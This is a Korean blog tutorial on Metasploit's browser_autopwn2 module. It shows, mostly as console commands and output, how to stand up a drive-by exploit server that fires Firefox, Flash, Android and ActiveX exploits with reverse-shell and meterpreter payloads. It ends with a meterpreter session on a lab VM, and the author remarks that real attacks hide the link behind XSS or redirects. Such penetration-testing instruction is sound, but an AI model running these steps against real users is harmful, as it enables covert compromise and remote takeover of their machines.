8/07/2017

[MAD-METASPLOIT] 0x21 - Browser attack

on   in ,   with No comments




Autopwn을 이용한 Browser attack


autopwn은 웹/모바일 브라우저를 대상으로 여러 Exploit 을 체크하고 실행해주는 모듈입니다.


HAHWUL exploit(handler) > search autopwn

Matching Modules
================

   Name                               Disclosure Date  Rank    Description
   ----                               ---------------  ----    -----------
   auxiliary/server/browser_autopwn                    normal  HTTP Client Automatic Exploiter
   auxiliary/server/browser_autopwn2  2015-07-05       normal  HTTP Client Automatic Exploiter 2 (Browser Autopwn)


그냥 autopwn과 autopwn2는 뭐 크게 차이는 없지만.. 그래도 최신이 좋을겁니다.

HAHWUL exploit(handler) > use auxiliary/server/browser_autopwn2 
HAHWUL auxiliary(browser_autopwn2) > show options

Module options (auxiliary/server/browser_autopwn2):

   Name             Current Setting  Required  Description
   ----             ---------------  --------  -----------
   EXCLUDE_PATTERN                   no        Pattern search to exclude specific modules
   INCLUDE_PATTERN                   no        Pattern search to include specific modules
   Retries          true             no        Allow the browser to retry the module
   SRVHOST          0.0.0.0          yes       The local host to listen on. This must be an address on the local machine or 0.0.0.0
   SRVPORT          8080             yes       The local port to listen on.
   SSL              false            no        Negotiate SSL for incoming connections
   SSLCert                           no        Path to a custom SSL certificate (default is randomly generated)
   URIPATH                           no        The URI to use for this exploit (default is random)


Auxiliary action:

   Name       Description
   ----       -----------
   WebServer  Start a bunch of modules and direct clients to appropriate exploits

URIPATH는 경로 위치이구요, 미 지정시 랜덤하게 생성됩니다.

 HAHWUL auxiliary(browser_autopwn2) > set URIPATH /
URIPATH => /
HAHWUL auxiliary(browser_autopwn2) > set SRVPORT 4242
SRVPORT => 4242
HAHWUL auxiliary(browser_autopwn2) > set SRVHOST  192.168.56.101
SRVHOST =>  192.168.56.101
HAHWUL auxiliary(browser_autopwn2) > exploit

 HAHWUL auxiliary(browser_autopwn2) > 
[*] Starting exploit modules...
[*] Starting listeners...
[*] Time spent: 21.340055737
[-] Exploit failed [bad-config]: Rex::BindFailed The address is already in use or unavailable: (0.0.0.0:4444).
[*] Using URL: http:// 192.168.56.101:4242/

[*] The following is a list of exploits that BrowserAutoPwn will consider using.
[*] Exploits with the highest ranking and newest will be tried first.

Exploits
========

 Order  Rank       Name                                       Payload
 -----  ----       ----                                       -------
 1      Excellent  firefox_webidl_injection                   firefox/shell_reverse_tcp on 4442
 2      Excellent  firefox_tostring_console_injection         firefox/shell_reverse_tcp on 4442
 3      Excellent  firefox_svg_plugin                         firefox/shell_reverse_tcp on 4442
 4      Excellent  firefox_proto_crmfrequest                  firefox/shell_reverse_tcp on 4442
 5      Excellent  webview_addjavascriptinterface             android/meterpreter/reverse_tcp on 4443
 6      Excellent  samsung_knox_smdm_url                      android/meterpreter/reverse_tcp on 4443
 7      Great      adobe_flash_worker_byte_array_uaf          windows/meterpreter/reverse_tcp on 4444
 8      Great      adobe_flash_domain_memory_uaf              windows/meterpreter/reverse_tcp on 4444
 9      Great      adobe_flash_copy_pixels_to_byte_array      windows/meterpreter/reverse_tcp on 4444
 10     Great      adobe_flash_casi32_int_overflow            windows/meterpreter/reverse_tcp on 4444
 11     Great      adobe_flash_uncompress_zlib_uaf            windows/meterpreter/reverse_tcp on 4444
 12     Great      adobe_flash_shader_job_overflow            windows/meterpreter/reverse_tcp on 4444
 13     Great      adobe_flash_shader_drawing_fill            windows/meterpreter/reverse_tcp on 4444
 14     Great      adobe_flash_pixel_bender_bof               windows/meterpreter/reverse_tcp on 4444
 15     Great      adobe_flash_opaque_background_uaf          windows/meterpreter/reverse_tcp on 4444
 16     Great      adobe_flash_net_connection_confusion       windows/meterpreter/reverse_tcp on 4444
 17     Great      adobe_flash_nellymoser_bof                 windows/meterpreter/reverse_tcp on 4444
 18     Great      adobe_flash_hacking_team_uaf               windows/meterpreter/reverse_tcp on 4444
 19     Good       wellintech_kingscada_kxclientdownload      windows/meterpreter/reverse_tcp on 4444
 20     Good       ms14_064_ole_code_execution                windows/meterpreter/reverse_tcp on 4444
 21     Good       adobe_flash_uncompress_zlib_uninitialized  windows/meterpreter/reverse_tcp on 4444

[+] Please use the following URL for the browser attack:
[+] BrowserAutoPwn URL: http:// 192.168.56.101:4242/
[*] Server started.

다른 일반 사용자가 웹 브라우저를 통해 http:// 192.168.56.101:4242 주소 접근 시 각 Browser에 맞는 Exploit 코드를 로드하여 사용자를 감염시킵니다.
물론 이 과정은 눈에 띄기 때문에 실제론 XSS나 URL Redirection 등을 이용해서 사용자가 인지하기 어려운 순간에 감염시키게 되죠.

HAHWUL auxiliary(browser_autopwn2) > 
[*] Gathering target information for  192.168.56.101
[*] Sending HTML response to  192.168.56.101
[*]  192.168.56.101     wellintech_kingscada_kxclientdownload - Requested: /HVzrMiilwJj/eNwxdK/
[*]  192.168.56.101     wellintech_kingscada_kxclientdownload - Sending KingScada kxClientDownload.ocx ActiveX Remote Code Execution
...snip...

HAHWUL auxiliary(browser_autopwn2) > sessions -l

Active sessions
===============

  Id  Type                     Information                         Connection
  --  ----                     -----------                         ----------
  1   meterpreter x86/windows  HAHWUL\Test-Virtualbox @ HAHWUL   192.168.56.101:4242 ->  192.168.56.101:38258 (192.168.56.101)




HAHWUL

Security engineer, Gopher and H4cker!
Share: | Coffee Me:

0 개의 댓글:

Post a Comment